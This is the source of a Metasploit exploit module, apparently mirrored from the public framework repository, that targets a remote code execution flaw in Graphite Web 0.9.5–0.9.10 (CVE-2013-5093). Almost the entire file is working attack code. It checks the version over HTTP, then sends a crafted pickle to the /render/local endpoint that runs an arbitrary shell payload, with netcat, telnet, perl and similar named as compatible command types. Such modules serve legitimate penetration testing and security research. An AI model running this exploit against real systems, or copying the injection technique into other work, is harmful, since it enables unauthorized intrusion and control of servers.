Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/unix/webapp/graphite_pickle_exec.rb
19500 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = ExcellentRanking

8


9
  include Msf::Exploit::Remote::HttpClient

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'Graphite Web Unsafe Pickle Handling',

16
        'Description' => %q{

17
          This module exploits a remote code execution vulnerability in the pickle

18
          handling of the rendering code in the Graphite Web project between version

19
          0.9.5 and 0.9.10 (both included).

20
        },

21
        'Author' => [

22
          'Charlie Eriksen', # Initial discovery and exploit

23
          'funkypickle' # Version check to prove vulnerable

24
        ],

25
        'License' => MSF_LICENSE,

26
        'References' => [

27
          [ 'CVE', '2013-5093'],

28
          [ 'URL', 'http://ceriksen.com/2013/08/20/graphite-remote-code-execution-vulnerability-advisory/']

29
        ],

30
        'Platform' => 'unix',

31
        'Arch' => ARCH_CMD,

32
        'Privileged' => false,

33
        'Targets'	=> [ ['Automatic', {} ] ],

34
        'DisclosureDate' => '2013-08-20',

35
        'DefaultTarget' => 0,

36
        'Payload' => {

37
          'DisableNops' => true,

38
          'Space'	=> 16384,

39
          'Compat'	=>

40
                        {

41
                          'PayloadType' => 'cmd',

42
                          'RequiredCmd' => 'python generic telnet netcat perl ruby'

43
                        }

44
        },

45
        'Notes' => {

46
          'Reliability' => UNKNOWN_RELIABILITY,

47
          'Stability' => UNKNOWN_STABILITY,

48
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

49
        }

50
      )

51
    )

52


53
    register_options(

54
      [

55
        OptString.new('TARGETURI', [ true, 'The path to a vulnerable application', '/'])

56
      ]

57
    )

58
  end

59


60
  def check

61
    res1 = send_request_cgi({

62
      # trailing slash required

63
      'uri' => normalize_uri(target_uri.path, 'version/'),

64
      'method' => 'GET'

65
    })

66


67
    res2 = send_request_cgi({

68
      'uri' => normalize_uri(target_uri.path, 'render', 'local'),

69
      'method' => 'POST'

70
    })

71


72
    if (res1 and %w(0.9.5 0.9.10).include?(res1.body.strip)) and (res2 and res2.code == 500)

73
      return Exploit::CheckCode::Vulnerable

74
    end

75


76
    return Exploit::CheckCode::Safe

77
  end

78


79
  def exploit

80
    data = "line\ncposix\nsystem\np1\n(S'#{payload.encoded}'\np2\ntp3\nRp4\n."

81


82
    print_status("Sending exploit payload...")

83


84
    response = send_request_cgi({

85
      'uri' => normalize_uri(target_uri.path, 'render', 'local'),

86
      'method' => 'POST',

87
      'data' => data

88
    })

89
  end

90
end

91


92